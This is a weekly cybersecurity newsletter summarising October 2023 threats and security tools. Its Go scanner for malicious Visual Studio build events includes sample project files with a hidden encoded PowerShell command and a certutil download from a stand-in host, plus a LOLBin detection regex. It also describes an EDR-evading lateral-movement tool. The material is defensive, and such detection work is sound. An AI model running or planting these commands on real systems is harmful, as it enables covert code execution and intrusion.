Week 41, October 9-15, 2023
Week 41, October 9-15, 2023. Cybersecurity Weekly Updates.
This week in the world of cybersecurity:
A massive ad-fraud botnet built from compromised Android and iOS devices has come to light, a reminder that consumer hardware is routinely monetised without its owners noticing.
Cybercriminals are targeting senior executives at U.S. firms with the EvilProxy phishing kit. EvilProxy is an adversary-in-the-middle kit: it proxies the real login page and captures the session cookie after authentication, so one-time codes and push approvals do not protect the victim; only phishing-resistant methods (passkeys, FIDO2 keys) and session-binding controls do.
Meanwhile, the disclosure of high-severity flaws in ConnectedIO's 3G/4G routers has renewed concern about the security of Internet of Things (IoT) devices, which are rarely patched once deployed.
A security patch addressing two new flaws in the curl library is scheduled for October 11. Because curl and libcurl are statically linked or vendored into a great many products, the system package is only part of the update surface; inventory the embedded copies as well.
Google is making passkeys the default sign-in option for personal Google accounts. Passkeys are bound to the origin they were created for, which is exactly the property that defeats the proxy-style phishing above.
Recent Tools and Techniques
These are some of the recent tools and techniques in the cyber-security sphere that have captured my attention.
FHC, short for Fast HTTP Checker, is a tool written in Rust that builds for Linux, Windows, macOS and Android, on x86-64, aarch64 and 32-bit ARM among other targets. Its purpose is a very fast liveness check for large lists of web hosts. It attempts HTTPS first and falls back to HTTP only when the HTTPS attempt fails, so a host that serves plain HTTP is not missed. It is light on resources: the author reports running 1000 threads on a single-core machine with network bandwidth as the limiting factor, and roughly 913 host checks per second with default settings on a Google Cloud VM. Real throughput varies with the mix of hosts, since each HTTP-only host costs a failed HTTPS attempt before the fallback, and hosts that time out may be worth re-checking. The project demonstrates the tool against resolved subdomains of google.com.
The Package Analysis project (part of the OpenSSF) runs packages from open source repositories in a sandbox and records what they do: the files they access, the addresses they connect to, and the commands they execute. It also tracks behavior across versions, so a package that was benign yesterday and starts opening network connections today is flagged. The aim is to detect and surface malicious behavior in open source packages, to help consumers choose packages, and to give researchers data on the ecosystem. It integrates with the Package Feeds project and is built from a scheduler, analysis modules (a one-shot analyzer and worker components), and a loader that stores results in BigQuery. The intent is shared, community-run infrastructure for inspecting package behavior, with each piece usable on its own for supplying package feeds or runtime behavior data. Packages are isolated in gVisor containers, which allows deep observation including strace output and packet captures without the analyzed code reaching the host.
EvilSln is a proof of concept for a new exploitation technique against Visual Studio projects, highlighting the risk of simply opening an untrusted .sln file. The background is the Lazarus APT group's campaign of early 2021, which delivered Visual Studio projects whose build event commands ran malicious code when the victim compiled them. The lesson generalises: a project file is code, and Visual Studio, JetBrains IDEs and VS Code all execute parts of it (build events, tasks, run configurations) when a project is opened or built. Some of these products have since added trust prompts for untrusted projects; EvilSln exists to show that the risk remains and to help users protect themselves.
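The Lazarus technique mentioned above, a shell command hidden in a project's build events, can be caught before the project is ever opened. The Go scanner below is an added example written for this page; it is not EvilSln's code and not a detection for EvilSln's own technique. It walks an MSBuild project file without assuming a full schema, collects the three shapes in which MSBuild accepts a command (a `PreBuildEvent`/`PostBuildEvent`/`PreLinkEvent` property in a .csproj, the nested `<Command>` form in a .vcxproj, and an `<Exec Command="..."/>` task), and applies a deliberately narrow, hypothetical heuristic for LOLBin and download-and-execute patterns. Both project files are constructed samples.

```go
package main

import (
	"encoding/xml"
	"fmt"
	"regexp"
	"strings"
)

// node is a schema-free XML element; the scanner walks the tree instead of
// depending on a full MSBuild schema.
type node struct {
	XMLName xml.Name
	Attrs   []xml.Attr `xml:",any,attr"`
	Text    string     `xml:",chardata"`
	Kids    []node     `xml:",any"`
}

// Finding is one command that MSBuild would hand to cmd.exe during a build.
type Finding struct {
	Element    string // PreBuildEvent, PostBuildEvent, PreLinkEvent or Exec
	Command    string
	Suspicious bool
}

// commandElements are the MSBuild constructs that run a shell command.
var commandElements = map[string]bool{
	"PreBuildEvent": true, "PostBuildEvent": true, "PreLinkEvent": true, "Exec": true,
}

// suspiciousRe is a hypothetical heuristic for this example: encoded or
// download-and-run PowerShell and a handful of LOLBins that almost never
// belong in a legitimate build step. Tune it to your own code base.
var suspiciousRe = regexp.MustCompile(
	`(?i)(powershell|pwsh).*(-enc|-e\b|downloadstring|iex|invoke-expression)` +
		`|certutil.*-urlcache|bitsadmin|mshta|rundll32|regsvr32.*/i:|curl .*\|`)

func attr(n node, name string) string {
	for _, a := range n.Attrs {
		if a.Name.Local == name {
			return a.Value
		}
	}
	return ""
}

// commandOf extracts the command text from any of the three MSBuild shapes.
func commandOf(n node) string {
	if n.XMLName.Local == "Exec" {
		return strings.TrimSpace(attr(n, "Command")) // <Exec Command="..."/>
	}
	if txt := strings.TrimSpace(n.Text); txt != "" {
		return txt // <PreBuildEvent>...</PreBuildEvent> (.csproj property)
	}
	for _, k := range n.Kids { // <PreBuildEvent><Command>...</Command></PreBuildEvent> (.vcxproj)
		if k.XMLName.Local == "Command" {
			return strings.TrimSpace(k.Text)
		}
	}
	return ""
}

func walk(n node, out *[]Finding) {
	if commandElements[n.XMLName.Local] {
		if cmd := commandOf(n); cmd != "" {
			*out = append(*out, Finding{n.XMLName.Local, cmd, suspiciousRe.MatchString(cmd)})
		}
	}
	for _, k := range n.Kids {
		walk(k, out)
	}
}

// ScanProject returns every build-time command in an MSBuild project file,
// in document order.
func ScanProject(src string) ([]Finding, error) {
	var root node
	if err := xml.Unmarshal([]byte(src), &root); err != nil {
		return nil, err
	}
	var out []Finding
	walk(root, &out)
	return out, nil
}

// Constructed samples. BASE64PAYLOAD stands in for an encoded command.
const sampleCsproj = `<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <PreBuildEvent>powershell -nop -w hidden -enc BASE64PAYLOAD</PreBuildEvent>
  </PropertyGroup>
  <Target Name="Prep" BeforeTargets="Build">
    <Exec Command="echo building" />
  </Target>
</Project>`

const sampleVcxproj = `<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <ItemDefinitionGroup>
    <PreBuildEvent>
      <Command>certutil -urlcache -split -f http://example.invalid/x %TEMP%\x.dat</Command>
    </PreBuildEvent>
    <PostBuildEvent>
      <Command>copy "$(OutDir)app.config" "$(OutDir)settings.xml"</Command>
    </PostBuildEvent>
  </ItemDefinitionGroup>
</Project>`

func main() {
	for name, src := range map[string]string{"app.csproj": sampleCsproj, "app.vcxproj": sampleVcxproj} {
		findings, err := ScanProject(src)
		if err != nil {
			fmt.Println(name, "parse error:", err)
			continue
		}
		for _, f := range findings {
			flag := "  "
			if f.Suspicious {
				flag = "!!"
			}
			fmt.Printf("%s %-12s %-15s %s\n", flag, name, f.Element, f.Command)
		}
	}
}
```

Run it over every `*.csproj`, `*.vcxproj` and `*.targets` file in a cloned repository before opening the solution, and treat any finding, not just a flagged one, as something to read: the heuristic only ranks, the real control is that no build-time command should be a surprise. Property references such as `$(OutDir)` are not expanded here, so a command assembled from properties defined elsewhere in the project will appear in its unexpanded form.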
LatLoader is a proof-of-concept module for automated lateral movement with the Havoc C2 framework. Its primary aim is to help others learn BOF (Beacon Object File) and Havoc module development. It is also a useful reference for basic EDR (Endpoint Detection and Response) rule evasion in the specific context of lateral movement. The sideload subcommand is the most complete part of the PoC: it attempts lateral movement through DLL sideloading while avoiding the default Elastic EDR rules. The project's README has a section titled "Elastic EDR Rule Evasions" that lists the specific Elastic rules the module sidesteps and how; for defenders that list is the useful part, since each entry is a rule worth re-reading for the gap it leaves.
That’s a wrap on this week’s edition of the Cyber-Security Update. Remember, the cyber-security landscape is ever-changing, and staying informed is your primary defense. Hopefully, the insights and information shared today will assist in navigating this complex domain and in strengthening defenses against potential threats. Stay vigilant, stay informed, and look forward to more insights into the world of cyber-security in next week’s edition.
To stay in sync with the weekly cyber-security roundups, remember to subscribe to the newsletter and follow on social media platforms. If there are any questions or specific topics you’d like to see covered, don’t hesitate to get in touch.